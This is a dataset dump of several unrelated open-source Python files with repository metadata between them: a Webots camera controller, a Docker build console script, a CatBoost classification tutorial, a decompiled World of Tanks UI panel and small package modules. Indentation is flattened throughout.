# Copyright 1996-2023 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An example of use of a camera device with recognition capability.
"""
from controller import Robot, Display
class Controller(Robot):
def __init__(self):
super(Controller, self).__init__()
self.timeStep = 64
self.camera = self.getDevice('camera')
self.camera.enable(self.timeStep)
self.camera.recognitionEnable(self.timeStep)
self.camera.enableRecognitionSegmentation()
self.display = self.getDevice('segmented image display')
self.left_motor = self.getDevice('left wheel motor')
self.right_motor = self.getDevice('right wheel motor')
self.left_motor.setPosition(float('inf'))
self.right_motor.setPosition(float('inf'))
self.left_motor.setVelocity(-1.5)
self.right_motor.setVelocity(1.5)
def run(self):
width = self.camera.getWidth()
height = self.camera.getHeight()
while self.step(self.timeStep) != -1:
if self.camera.isRecognitionSegmentationEnabled() and self.camera.getRecognitionSamplingPeriod() > 0:
# Get the segmented image and display it in the Display
data = self.camera.getRecognitionSegmentationImage()
if data:
segmented_image = self.display.imageNew(data, Display.BGRA, width, height)
self.display.imagePaste(segmented_image, 0, 0, False)
self.display.imageDelete(segmented_image)
controller = Controller()
controller.run()
|
3d3ddab2b13aeff1a4794e68149c6ccdd1aec1c4
|
c3ddaf355e551b04a7ba9882497320d49c2cb461
|
/bin/console
|
0ec2645a0fe29c6833280f6f035838e00a934990
|
[
"MIT"
] |
permissive
|
webdevops/Dockerfile
|
f64dd04803279f20eb9881d9088117fd38df9909
|
e902a5dac2bc382905468b5db8481e43a7ecfcfb
|
refs/heads/master
| 2023-05-25T23:36:24.053754
| 2023-05-16T14:02:38
| 2023-05-16T14:02:38
| 44,695,081
| 1,630
| 599
|
MIT
| 2023-05-16T14:02:40
| 2015-10-21T18:09:48
|
Shell
|
UTF-8
|
Python
| false
| false
| 4,004
|
console
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, sys
# prevent bytecode
sys.dont_write_bytecode = True
# unbuffered stdout / stderr
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
sys.stderr = os.fdopen(sys.stderr.fileno(), 'w', 0)
import re, yaml
from cleo import Application
from webdevops import Configuration
from webdevops.docker.DockerBaseClient import DockerBaseClient
from webdevops.docker.DockerPyClient import DockerPyClient
from webdevops.docker.DockerCliClient import DockerCliClient
from command.docker_build_command import DockerBuildCommand
from command.docker_push_command import DockerPushCommand
from command.docker_pull_command import DockerPullCommand
from command.docker_exec_command import DockerExecCommand
from command.test_testinfra_command import TestTestinfraCommand
from command.test_serverspec_command import TestServerspecCommand
from command.generate_dockerfile_command import GenerateDockerfileCommand
from command.generate_graph_command import GenerateGraphCommand
from command.generate_provision_command import GenerateProvisionCommand
if __name__ == '__main__':
# Generate common paths
script_path = os.path.dirname(os.path.realpath(__file__))
root_path = os.path.dirname(script_path)
conf_path = os.path.join(root_path, 'conf')
def generatePath(path):
"""
Generate full path based on root path
"""
return os.path.abspath(os.path.join(root_path, (path)))
# Read console.yml for configuration
with open(os.path.join(conf_path, 'console.yml'), 'r') as stream:
try:
configuration = yaml.load(stream)
configuration['confPath'] = conf_path
except yaml.YAMLError as e:
configuration = None
print ' !!! Exception while loading configuration from %s:' % conf_path
print ''
print e
print ''
sys.exit(1)
# Check if configuration is valid
if configuration is None:
print ' !!! Configuration not found'
sys.exit(1)
# generate full paths
path_entries = [
'dockerPath',
'templatePath',
'provisionPath',
'imagePath',
'baselayoutPath',
'testinfraPath',
'serverspecPath',
'blacklistFile',
]
for key in path_entries:
if key in configuration:
configuration[key] = generatePath(configuration[key])
# Translate regexp
if 'docker' in configuration:
if 'pathRegex' in configuration['docker']:
configuration['docker']['pathRegex'] = re.compile(configuration['docker']['pathRegex'])
if 'pathRegex' in configuration['docker']:
configuration['docker']['autoPullBlacklist'] = re.compile(configuration['docker']['autoPullBlacklist'])
if 'dockerTest' in configuration:
if 'configuration' in configuration['dockerTest']:
if 'imageConfigurationRegex' in configuration['dockerTest']['configuration']:
configuration['dockerTest']['configuration']['imageConfigurationRegex'] = re.compile(configuration['dockerTest']['configuration']['imageConfigurationRegex'])
configuration = Configuration.merge(configuration)
configuration = Configuration.dotdictify(configuration)
# Init application
application = Application()
application.add(DockerBuildCommand(configuration=configuration))
application.add(DockerPushCommand(configuration=configuration))
application.add(DockerPullCommand(configuration=configuration))
application.add(DockerExecCommand(configuration=configuration))
application.add(TestTestinfraCommand(configuration=configuration))
application.add(TestServerspecCommand(configuration=configuration))
application.add(GenerateDockerfileCommand(configuration=configuration))
application.add(GenerateGraphCommand(configuration=configuration))
application.add(GenerateProvisionCommand(configuration=configuration))
application.run()
|
|
a1d0400f668a7a80af32f74c2fad6321c48e1860
|
010279e2ba272d09e9d2c4e903722e5faba2cf7a
|
/catboost/pytest/smoke_tests/classification_tutorial_cpu.py
|
0d140f566cbfbf95ba251cba74e2afe449b4a1fc
|
[
"Apache-2.0"
] |
permissive
|
catboost/catboost
|
854c1a1f439a96f1ae6b48e16644be20aa04dba2
|
f5042e35b945aded77b23470ead62d7eacefde92
|
refs/heads/master
| 2023-09-01T12:14:14.174108
| 2023-09-01T10:01:01
| 2023-09-01T10:22:12
| 97,556,265
| 8,012
| 1,425
|
Apache-2.0
| 2023-09-11T03:32:32
| 2017-07-18T05:29:04
|
Python
|
UTF-8
|
Python
| false
| false
| 18,866
|
py
|
classification_tutorial_cpu.py
|
import os
try:
import catboost_dev as catboost
from catboost_dev import *
from catboost_dev import datasets
from catboost_dev.utils import create_cd
from catboost_dev import CatBoostClassifier
from catboost_dev.widget import MetricVisualizer
from catboost_dev import cv
from catboost_dev.utils import get_roc_curve
from catboost_dev.utils import get_fpr_curve
from catboost_dev.utils import get_fnr_curve
from catboost_dev.utils import select_threshold
from catboost_dev import CatBoost
from catboost_dev.eval.catboost_evaluation import *
from catboost_dev.eval.evaluation_result import *
except:
import catboost
from catboost import *
from catboost import datasets
from catboost.utils import create_cd
from catboost import CatBoostClassifier
from catboost.widget import MetricVisualizer
from catboost import cv
from catboost.utils import get_roc_curve
from catboost.utils import get_fpr_curve
from catboost.utils import get_fnr_curve
from catboost.utils import select_threshold
from catboost import CatBoost
from catboost.eval.catboost_evaluation import *
from catboost.eval.evaluation_result import *
## Solving classification problems with CatBoost
#[](https://colab.research.google.com/github/catboost/tutorials/blob/master/classification/classification_tutorial.ipynb)
#
#In this tutorial we will use dataset Amazon Employee Access Challenge from [Kaggle](https://www.kaggle.com) competition for our experiments. Data can be downloaded [here](https://www.kaggle.com/c/amazon-employee-access-challenge/data).
### Libraries installation
#!pip install --user --upgrade catboost
#!pip install --user --upgrade ipywidgets
#!pip install shap
#!pip install sklearn
#!pip install --upgrade numpy
#!jupyter nbextension enable --py widgetsnbextension
print(catboost.__version__)
os.system("python --version")
### Reading the data
import pandas as pd
import os
import numpy as np
np.set_printoptions(precision=4)
(train_df, test_df) = catboost.datasets.amazon()
train_df.head()
### Preparing your data
#Label values extraction
y = train_df.ACTION
X = train_df.drop('ACTION', axis=1)
#Categorical features declaration
cat_features = list(range(0, X.shape[1]))
print(cat_features)
#Looking on label balance in dataset
print('Labels: {}'.format(set(y)))
print('Zero count = {}, One count = {}'.format(len(y) - sum(y), sum(y)))
#Ways to create Pool class
dataset_dir = './amazon'
if not os.path.exists(dataset_dir):
os.makedirs(dataset_dir)
# We will be able to work with files with/without header and
# with different separators.
train_df.to_csv(
os.path.join(dataset_dir, 'train.tsv'),
index=False, sep='\t', header=False
)
test_df.to_csv(
os.path.join(dataset_dir, 'test.tsv'),
index=False, sep='\t', header=False
)
train_df.to_csv(
os.path.join(dataset_dir, 'train.csv'),
index=False, sep=',', header=True
)
test_df.to_csv(
os.path.join(dataset_dir, 'test.csv'),
index=False, sep=',', header=True
)
os.system("head amazon/train.csv")
feature_names = dict()
for column, name in enumerate(train_df):
if column == 0:
continue
feature_names[column] = name
create_cd(
label=0,
cat_features=list(range(1, train_df.columns.shape[0])),
feature_names=feature_names,
output_path=os.path.join(dataset_dir, 'train.cd')
)
os.system("cat amazon/train.cd")
pool1 = Pool(data=X, label=y, cat_features=cat_features)
pool2 = Pool(
data=os.path.join(dataset_dir, 'train.csv'),
delimiter=',',
column_description=os.path.join(dataset_dir, 'train.cd'),
has_header=True
)
pool3 = Pool(data=X, cat_features=cat_features)
# Fastest way to create a Pool is to create it from numpy matrix.
# This way should be used if you want fast predictions
# or fastest way to load the data in python.
X_prepared = X.values.astype(str).astype(object)
# For FeaturesData class categorial features must have type str
pool4 = Pool(
data=FeaturesData(
cat_feature_data=X_prepared,
cat_feature_names=list(X)
),
label=y.values
)
print('Dataset shape')
print('dataset 1:' + str(pool1.shape) +
'\ndataset 2:' + str(pool2.shape) +
'\ndataset 3:' + str(pool3.shape) +
'\ndataset 4: ' + str(pool4.shape))
print('\n')
print('Column names')
print('dataset 1:')
print(pool1.get_feature_names())
print('\ndataset 2:')
print(pool2.get_feature_names())
print('\ndataset 3:')
print(pool3.get_feature_names())
print('\ndataset 4:')
print(pool4.get_feature_names())
### Split your data into train and validation
from sklearn.model_selection import train_test_split
X_train, X_validation, y_train, y_validation = train_test_split(X, y, train_size=0.8, random_state=1234)
### Selecting the objective function
#Possible options for binary classification:
#
#`Logloss`
#
#`CrossEntropy` for probabilities in target
model = CatBoostClassifier(
iterations=5,
learning_rate=0.1,
# loss_function='CrossEntropy'
)
model.fit(
X_train, y_train,
cat_features=cat_features,
eval_set=(X_validation, y_validation),
verbose=False
)
print('Model is fitted: ' + str(model.is_fitted()))
print('Model params:')
print(model.get_params())
### Stdout of the training
model = CatBoostClassifier(
iterations=15,
# verbose=5,
)
model.fit(
X_train, y_train,
cat_features=cat_features,
eval_set=(X_validation, y_validation),
)
### Metrics calculation and graph plotting
model = CatBoostClassifier(
iterations=50,
random_seed=63,
learning_rate=0.5,
custom_loss=['AUC', 'Accuracy']
)
model.fit(
X_train, y_train,
cat_features=cat_features,
eval_set=(X_validation, y_validation),
verbose=False,
plot=True
)
### Model comparison
model1 = CatBoostClassifier(
learning_rate=0.7,
iterations=100,
random_seed=0,
train_dir='learing_rate_0.7'
)
model2 = CatBoostClassifier(
learning_rate=0.01,
iterations=100,
random_seed=0,
train_dir='learing_rate_0.01'
)
model1.fit(
X_train, y_train,
eval_set=(X_validation, y_validation),
cat_features=cat_features,
verbose=False
)
model2.fit(
X_train, y_train,
eval_set=(X_validation, y_validation),
cat_features=cat_features,
verbose=False
)
MetricVisualizer(['learing_rate_0.01', 'learing_rate_0.7']).start()
### Best iteration
model = CatBoostClassifier(
iterations=100,
random_seed=63,
learning_rate=0.5,
# use_best_model=False
)
model.fit(
X_train, y_train,
cat_features=cat_features,
eval_set=(X_validation, y_validation),
verbose=False,
plot=True
)
print('Tree count: ' + str(model.tree_count_))
### Cross-validation
params = {}
params['loss_function'] = 'Logloss'
params['iterations'] = 80
params['custom_loss'] = 'AUC'
params['random_seed'] = 63
params['learning_rate'] = 0.5
cv_data = cv(
params = params,
pool = Pool(X, label=y, cat_features=cat_features),
fold_count=5,
shuffle=True,
partition_random_seed=0,
plot=True,
stratified=False,
verbose=False
)
cv_data.head()
best_value = np.min(cv_data['test-Logloss-mean'])
best_iter = np.argmin(cv_data['test-Logloss-mean'])
print('Best validation Logloss score, not stratified: {:.4f}+-{:.4f} on step {}'.format(
best_value,
cv_data['test-Logloss-std'][best_iter],
best_iter)
)
cv_data = cv(
params = params,
pool = Pool(X, label=y, cat_features=cat_features),
fold_count=5,
type = 'Classical',
shuffle=True,
partition_random_seed=0,
plot=True,
stratified=True,
verbose=False
)
best_value = np.min(cv_data['test-Logloss-mean'])
best_iter = np.argmin(cv_data['test-Logloss-mean'])
print('Best validation Logloss score, stratified: {:.4f}+-{:.4f} on step {}'.format(
best_value,
cv_data['test-Logloss-std'][best_iter],
best_iter)
)
### Overfitting detector
model_with_early_stop = CatBoostClassifier(
iterations=200,
random_seed=63,
learning_rate=0.5,
early_stopping_rounds=20
)
model_with_early_stop.fit(
X_train, y_train,
cat_features=cat_features,
eval_set=(X_validation, y_validation),
verbose=False,
plot=True
)
print(model_with_early_stop.tree_count_)
model_with_early_stop = CatBoostClassifier(
eval_metric='AUC',
iterations=200,
random_seed=63,
learning_rate=0.5,
early_stopping_rounds=20
)
model_with_early_stop.fit(
X_train, y_train,
cat_features=cat_features,
eval_set=(X_validation, y_validation),
verbose=False,
plot=True
)
print(model_with_early_stop.tree_count_)
### Select decision boundary
model = CatBoostClassifier(
random_seed=63,
iterations=200,
learning_rate=0.03,
)
model.fit(
X_train, y_train,
cat_features=cat_features,
verbose=False,
plot=True
)
#
import sklearn
from sklearn import metrics
eval_pool = Pool(X_validation, y_validation, cat_features=cat_features)
curve = get_roc_curve(model, eval_pool)
(fpr, tpr, thresholds) = curve
roc_auc = sklearn.metrics.auc(fpr, tpr)
import matplotlib.pyplot as plt
plt.figure(figsize=(16, 8))
lw = 2
plt.plot(fpr, tpr, color='darkorange',
lw=lw, label='ROC curve (area = %0.2f)' % roc_auc, alpha=0.5)
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--', alpha=0.5)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xticks(fontsize=16)
plt.yticks(fontsize=16)
plt.grid(True)
plt.xlabel('False Positive Rate', fontsize=16)
plt.ylabel('True Positive Rate', fontsize=16)
plt.title('Receiver operating characteristic', fontsize=20)
plt.legend(loc="lower right", fontsize=16)
plt.show(block=False)
(thresholds, fpr) = get_fpr_curve(curve=curve)
(thresholds, fnr) = get_fnr_curve(curve=curve)
plt.figure(figsize=(16, 8))
lw = 2
plt.plot(thresholds, fpr, color='blue', lw=lw, label='FPR', alpha=0.5)
plt.plot(thresholds, fnr, color='green', lw=lw, label='FNR', alpha=0.5)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xticks(fontsize=16)
plt.yticks(fontsize=16)
plt.grid(True)
plt.xlabel('Threshold', fontsize=16)
plt.ylabel('Error Rate', fontsize=16)
plt.title('FPR-FNR curves', fontsize=20)
plt.legend(loc="lower left", fontsize=16)
plt.show(block=False)
print(select_threshold(model=model, data=eval_pool, FNR=0.01))
print(select_threshold(model=model, data=eval_pool, FPR=0.01))
### Snapshotting
# !rm 'catboost_info/snapshot.bkp'
model = CatBoostClassifier(
iterations=100,
save_snapshot=True,
snapshot_file='snapshot.bkp',
snapshot_interval=1,
random_seed=43
)
model.fit(
X_train, y_train,
eval_set=(X_validation, y_validation),
cat_features=cat_features,
verbose=True
)
### Model predictions
print(model.predict_proba(X=X_validation))
print(model.predict(data=X_validation))
raw_pred = model.predict(
data=X_validation,
prediction_type='RawFormulaVal'
)
print(raw_pred)
from numpy import exp
sigmoid = lambda x: 1 / (1 + exp(-x))
probabilities = sigmoid(raw_pred)
print(probabilities)
X_prepared = X_validation.values.astype(str).astype(object)
# For FeaturesData class categorial features must have type str
fast_predictions = model.predict_proba(
X=FeaturesData(
cat_feature_data=X_prepared,
cat_feature_names=list(X_validation)
)
)
print(fast_predictions)
### Staged prediction
predictions_gen = model.staged_predict_proba(
data=X_validation,
ntree_start=0,
ntree_end=5,
eval_period=1
)
try:
for iteration, predictions in enumerate(predictions_gen):
print('Iteration ' + str(iteration) + ', predictions:')
print(predictions)
except Exception:
pass
### Solving MultiClassification problem
model = CatBoostClassifier(
iterations=50,
random_seed=43,
loss_function='MultiClass'
)
model.fit(
X_train, y_train,
cat_features=cat_features,
eval_set=(X_validation, y_validation),
verbose=False,
plot=True
)
#For multiclass problems with many classes sometimes it's better to solve classification problem using ranking.
#To do that we will build a dataset with groups.
#Every group will represent one object from our initial dataset.
#But it will have one additional categorical feature - possible class value.
#Target values will be equal to 1 if the class value is equal to the correct class, and 0 otherwise.
#Thus each group will have exactly one 1 in labels, and some zeros.
#You can put all possible class values in the group or you can try setting only hard negatives if there are too many labels.
#We'll show this approach on an example of binary classification problem.
from copy import deepcopy
def build_multiclass_ranking_dataset(X, y, cat_features, label_values=[0,1], start_group_id=0):
ranking_matrix = []
ranking_labels = []
group_ids = []
X_train_matrix = X.values
y_train_vector = y.values
for obj_idx in range(X.shape[0]):
obj = list(X_train_matrix[obj_idx])
for label in label_values:
obj_of_given_class = deepcopy(obj)
obj_of_given_class.append(label)
ranking_matrix.append(obj_of_given_class)
ranking_labels.append(float(y_train_vector[obj_idx] == label))
group_ids.append(start_group_id + obj_idx)
final_cat_features = deepcopy(cat_features)
final_cat_features.append(X.shape[1]) # new feature that we are adding should be categorical.
return Pool(ranking_matrix, ranking_labels, cat_features=final_cat_features, group_id = group_ids)
params = {'iterations':150, 'learning_rate':0.01, 'l2_leaf_reg':30, 'random_seed':0, 'loss_function':'QuerySoftMax'}
groupwise_train_pool = build_multiclass_ranking_dataset(X_train, y_train, cat_features, [0,1])
groupwise_eval_pool = build_multiclass_ranking_dataset(X_validation, y_validation, cat_features, [0,1], X_train.shape[0])
model = CatBoost(params)
model.fit(
X=groupwise_train_pool,
verbose=False,
eval_set=groupwise_eval_pool,
plot=True
)
#Doing predictions with ranking mode
import math
obj = list(X_validation.values[0])
ratings = []
for label in [0,1]:
obj_with_label = deepcopy(obj)
obj_with_label.append(label)
rating = model.predict([obj_with_label])[0]
ratings.append(rating)
print('Raw values:', np.array(ratings))
def soft_max(values):
return [math.exp(val) / sum([math.exp(val) for val in values]) for val in values]
print('Probabilities', np.array(soft_max(ratings)))
### Metric evaluation on a new dataset
model = CatBoostClassifier(
random_seed=63,
iterations=200,
learning_rate=0.03,
)
model.fit(
X_train, y_train,
cat_features=cat_features,
verbose=50
)
metrics = model.eval_metrics(
data=pool1,
metrics=['Logloss','AUC'],
ntree_start=0,
ntree_end=0,
eval_period=1,
plot=True
)
print('AUC values:')
print(np.array(metrics['AUC']))
#
### Feature importances
model.get_feature_importance(prettified=True)
### Shap values
shap_values = model.get_feature_importance(pool1, type='ShapValues')
expected_value = shap_values[0,-1]
shap_values = shap_values[:,:-1]
print(shap_values.shape)
import shap
shap.initjs()
shap.force_plot(expected_value, shap_values[3,:], X.iloc[3,:], show=False)
import shap
shap.initjs()
shap.force_plot(expected_value, shap_values[91,:], X.iloc[91,:], show=False)
shap.summary_plot(shap_values, X, show=False)
X_small = X.iloc[0:200]
shap_small = shap_values[:200]
shap.force_plot(expected_value, shap_small, X_small, show=False)
### Feature evaluation
learn_params = {'iterations': 20, # 2000
'learning_rate': 0.5, # we set big learning_rate,
# because we have small
# #iterations
'random_seed': 0,
'verbose': False,
'loss_function' : 'Logloss',
'boosting_type': 'Plain'}
evaluator = CatboostEvaluation('amazon/train.tsv',
fold_size=10000, # <= 50% of dataset
fold_count=20,
column_description='amazon/train.cd',
partition_random_seed=0,
#working_dir=...
)
result = evaluator.eval_features(learn_config=learn_params,
eval_metrics=['Logloss', 'Accuracy'],
features_to_eval=[6, 7, 8])
logloss_result = result.get_metric_results('Logloss')
logloss_result.get_baseline_comparison(
ScoreConfig(ScoreType.Rel, overfit_iterations_info=False)
)
### Saving the model
my_best_model = CatBoostClassifier(iterations=10)
my_best_model.fit(
X_train, y_train,
eval_set=(X_validation, y_validation),
cat_features=cat_features,
verbose=False
)
my_best_model.save_model('catboost_model.bin')
my_best_model.save_model('catboost_model.json', format='json')
my_best_model.load_model('catboost_model.bin')
print(my_best_model.get_params())
print(my_best_model.random_seed_)
### Hyperparameter tunning
#### Training speed
fast_model = CatBoostClassifier(
random_seed=63,
iterations=150,
learning_rate=0.01,
boosting_type='Plain',
bootstrap_type='Bernoulli',
subsample=0.5,
one_hot_max_size=20,
rsm=0.5,
leaf_estimation_iterations=5,
max_ctr_complexity=1)
fast_model.fit(
X_train, y_train,
cat_features=cat_features,
verbose=False,
plot=True
)
#### Accuracy
tunned_model = CatBoostClassifier(
random_seed=63,
iterations=1000,
learning_rate=0.03,
l2_leaf_reg=3,
bagging_temperature=1,
random_strength=1,
one_hot_max_size=2,
leaf_estimation_method='Newton'
)
tunned_model.fit(
X_train, y_train,
cat_features=cat_features,
verbose=False,
eval_set=(X_validation, y_validation),
plot=True
)
### Training the model after parameter tunning
best_model = CatBoostClassifier(
random_seed=63,
iterations=int(tunned_model.tree_count_ * 1.2),
)
best_model.fit(
X, y,
cat_features=cat_features,
verbose=100
)
### Calculate predictions for the contest
X_test = test_df.drop('id', axis=1)
test_pool = Pool(data=X_test, cat_features=cat_features)
contest_predictions = best_model.predict_proba(test_pool)
print('Predictoins:')
print(contest_predictions)
### Prepare the submission
f = open('submit.csv', 'w')
f.write('Id,Action\n')
for idx in range(len(contest_predictions)):
line = str(test_df['id'][idx]) + ',' + str(contest_predictions[idx][1]) + '\n'
f.write(line)
f.close()
#Submit your solution [here](https://www.kaggle.com/c/amazon-employee-access-challenge/submit).
#Good luck!!!
|
96b16240cf8d7e7043366e30c4afde0e7f5a9365
|
393e491a112a6459ca23419596a793251676b39a
|
/src/petals/client/routing/__init__.py
|
3be2710846df972373f2821cfe0d16ca0d30de3c
|
[
"MIT"
] |
permissive
|
bigscience-workshop/petals
|
24508ba536377166ddcdf4a6a56b8cd3f5acf280
|
6ef6bf5fa24282809ec57ff7c60a43642c100daa
|
refs/heads/main
| 2023-09-01T04:19:24.801624
| 2023-08-31T06:31:03
| 2023-08-31T06:31:03
| 502,482,803
| 6,598
| 338
|
MIT
| 2023-09-07T01:29:15
| 2022-06-12T00:10:27
|
Python
|
UTF-8
|
Python
| false
| false
| 181
|
py
|
__init__.py
|
from petals.client.routing.sequence_manager import RemoteSequenceManager, maybe_log_traceback
from petals.client.routing.spending_policy import NoSpendingPolicy, SpendingPolicyBase
|
c04e02203a1c45adabee96e4f10636698e7f8876
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/battle_royale/scripts/client/battle_royale/gui/Scaleform/daapi/view/battle/consumables_panel.py
|
390929b1a5d61ce71391009013f3988c73b9ad4e
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 6,754
|
py
|
consumables_panel.py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: battle_royale/scripts/client/battle_royale/gui/Scaleform/daapi/view/battle/consumables_panel.py
import BigWorld
from constants import EQUIPMENT_STAGES
from Event import EventsSubscriber
from gui.Scaleform.daapi.view.battle.shared.consumables_panel import ConsumablesPanel, TOOLTIP_FORMAT
from gui.Scaleform.genConsts.CONSUMABLES_PANEL_SETTINGS import CONSUMABLES_PANEL_SETTINGS
from gui.battle_control.battle_constants import VEHICLE_VIEW_STATE
from gui.impl.gen import R
class BattleRoyaleConsumablesPanel(ConsumablesPanel):
__slots__ = ('__quantityMap',)
_PANEL_MAX_LENGTH = 10
_AMMO_START_IDX = 0
_AMMO_END_IDX = 1
_EQUIPMENT_START_IDX = 2
_EQUIPMENT_END_IDX = 9
_R_ARTEFACT_ICON = R.images.gui.maps.icons.battleRoyale.artefact
def __init__(self):
super(BattleRoyaleConsumablesPanel, self).__init__()
self.__quantityMap = [None] * self._PANEL_MAX_LENGTH
self.__equipmentRange = range(self._EQUIPMENT_START_IDX, self._EQUIPMENT_END_IDX + 1)
self.__es = EventsSubscriber()
return
def _populate(self):
super(BattleRoyaleConsumablesPanel, self)._populate()
vehStateCtrl = self.sessionProvider.shared.vehicleState
self.__es.subscribeToEvent(vehStateCtrl.onVehicleStateUpdated, self.__onVehicleLootAction)
self.__es.subscribeToEvent(BigWorld.player().onObserverVehicleChanged, self.__onEquipmentReset)
def _dispose(self):
self.__es.unsubscribeFromAllEvents()
super(BattleRoyaleConsumablesPanel, self)._dispose()
def _getPanelSettings(self):
return CONSUMABLES_PANEL_SETTINGS.BATTLE_ROYALE_SETTINGS_ID
def _onShellsAdded(self, intCD, descriptor, quantity, _, gunSettings):
if intCD in self._cds:
return
else:
slotIdx = self.__getNewSlotIdx(self._AMMO_START_IDX, self._AMMO_END_IDX)
if slotIdx is None:
return
self._addShellSlot(slotIdx, intCD, descriptor, quantity, gunSettings)
self._mask |= 1 << slotIdx
return
def _onShellsUpdated(self, intCD, quantity, *args):
if intCD not in self._cds:
return
super(BattleRoyaleConsumablesPanel, self)._onShellsUpdated(intCD, quantity, *args)
def _onNextShellChanged(self, intCD):
if intCD not in self._cds:
return
super(BattleRoyaleConsumablesPanel, self)._onNextShellChanged(intCD)
def _onCurrentShellChanged(self, intCD):
if intCD not in self._cds:
return
super(BattleRoyaleConsumablesPanel, self)._onCurrentShellChanged(intCD)
def _onGunSettingsSet(self, _):
self.__resetShellSlots()
self._resetDelayedReload()
def _onGunReloadTimeSet(self, currShellCD, state, skipAutoLoader):
if currShellCD not in self._cds:
return
super(BattleRoyaleConsumablesPanel, self)._onGunReloadTimeSet(currShellCD, state, skipAutoLoader)
def _onEquipmentAdded(self, intCD, item):
if item is None or intCD in self._cds:
return
else:
slotIdx = self.__getNewSlotIdx(self._EQUIPMENT_START_IDX, self._EQUIPMENT_END_IDX)
if slotIdx is None:
return
self._addEquipmentSlot(slotIdx, intCD, item)
self._mask |= 1 << slotIdx
return
def _isAvatarEquipment(self, item):
return False
def _resetOptDevices(self):
pass
def _addOptionalDeviceSlot(self, idx, intCD):
pass
def _buildEquipmentSlotTooltipText(self, item):
descriptor = item.getDescriptor()
body = descriptor.description
toolTip = TOOLTIP_FORMAT.format(descriptor.userString, body)
return toolTip
def _updateShellSlot(self, idx, quantity):
super(BattleRoyaleConsumablesPanel, self)._updateShellSlot(idx, quantity)
prevQuantity = self.__quantityMap[idx]
self.__quantityMap[idx] = quantity
if prevQuantity is not None and quantity > prevQuantity:
self.as_setGlowS(idx, CONSUMABLES_PANEL_SETTINGS.GLOW_ID_GREEN)
return
def _updateEquipmentSlot(self, idx, item):
super(BattleRoyaleConsumablesPanel, self)._updateEquipmentSlot(idx, item)
prevQuantity = self.__quantityMap[idx]
quantity = self.__quantityMap[idx] = item.getQuantity()
if prevQuantity is not None and quantity > prevQuantity:
self.as_setGlowS(idx, CONSUMABLES_PANEL_SETTINGS.GLOW_ID_GREEN)
return
else:
currStage = item.getStage()
prevStage = item.getPrevStage()
if currStage == EQUIPMENT_STAGES.READY and prevStage == EQUIPMENT_STAGES.COOLDOWN:
self.as_setGlowS(idx, CONSUMABLES_PANEL_SETTINGS.GLOW_ID_GREEN_SPECIAL)
elif currStage == EQUIPMENT_STAGES.COOLDOWN and prevStage in (EQUIPMENT_STAGES.READY, EQUIPMENT_STAGES.PREPARING, EQUIPMENT_STAGES.ACTIVE):
self.as_setGlowS(idx, CONSUMABLES_PANEL_SETTINGS.GLOW_ID_ORANGE)
elif currStage == EQUIPMENT_STAGES.READY and prevStage == EQUIPMENT_STAGES.PREPARING:
self.as_setEquipmentActivatedS(idx, False)
return
def _updateOptionalDeviceSlot(self, idx, isOn):
pass
def _showEquipmentGlow(self, equipmentIndex, glowType=CONSUMABLES_PANEL_SETTINGS.GLOW_ID_ORANGE):
pass
def _onPostMortemSwitched(self, noRespawnPossible, respawnAvailable):
self._reset()
def __onEquipmentReset(self):
self.__resetEquipmentSlots()
self.as_resetS(list())
def __getNewSlotIdx(self, startIdx=0, endIdx=_PANEL_MAX_LENGTH - 1):
resultIdx = None
for idx in range(startIdx, endIdx + 1):
if self._mask & 1 << idx == 0:
resultIdx = idx
break
return resultIdx
def __resetShellSlots(self):
for idx in range(self._AMMO_START_IDX, self._AMMO_END_IDX + 1):
self._mask &= ~(1 << idx)
self._cds[idx] = None
return
def __resetEquipmentSlots(self):
for idx in self.__equipmentRange:
self._mask &= ~(1 << idx)
self._cds[idx] = None
return
def __onVehicleLootAction(self, state, _):
if state != VEHICLE_VIEW_STATE.LOOT:
return
else:
self.__quantityMap = [ (numItems if numItems is not None else 0) for numItems in self.__quantityMap ]
vehStateCtrl = self.sessionProvider.shared.vehicleState
if vehStateCtrl is not None:
vehStateCtrl.onVehicleStateUpdated -= self.__onVehicleLootAction
return
|
a2ae69332cbdffa7e6f97abfefc57c47ea4ab15c
|
610244a938791d3d05c749804725f4a9b3831a96
|
/diagrams/ibm/general.py
|
5b49007062ef169f06f44042c9024d083df99fe7
|
[
"MIT"
] |
permissive
|
mingrammer/diagrams
|
66b62ab484eca9cc439aee9b1cffedb1fcb9dba6
|
b19b09761db6f0037fd76e527b9ce6918fbdfcfc
|
refs/heads/master
| 2023-09-04T04:57:36.727192
| 2023-05-22T23:51:10
| 2023-05-22T23:51:10
| 237,791,077
| 31,257
| 2,119
|
MIT
| 2023-09-05T15:45:52
| 2020-02-02T15:23:24
|
Python
|
UTF-8
|
Python
| false
| false
| 2,082
|
py
|
general.py
|
# This module is automatically generated by autogen.sh. DO NOT EDIT.
from . import _IBM
class _General(_IBM):
_type = "general"
_icon_dir = "resources/ibm/general"
class CloudMessaging(_General):
_icon = "cloud-messaging.png"
class CloudServices(_General):
_icon = "cloud-services.png"
class Cloudant(_General):
_icon = "cloudant.png"
class CognitiveServices(_General):
_icon = "cognitive-services.png"
class DataSecurity(_General):
_icon = "data-security.png"
class Enterprise(_General):
_icon = "enterprise.png"
class GovernanceRiskCompliance(_General):
_icon = "governance-risk-compliance.png"
class IBMContainers(_General):
_icon = "ibm-containers.png"
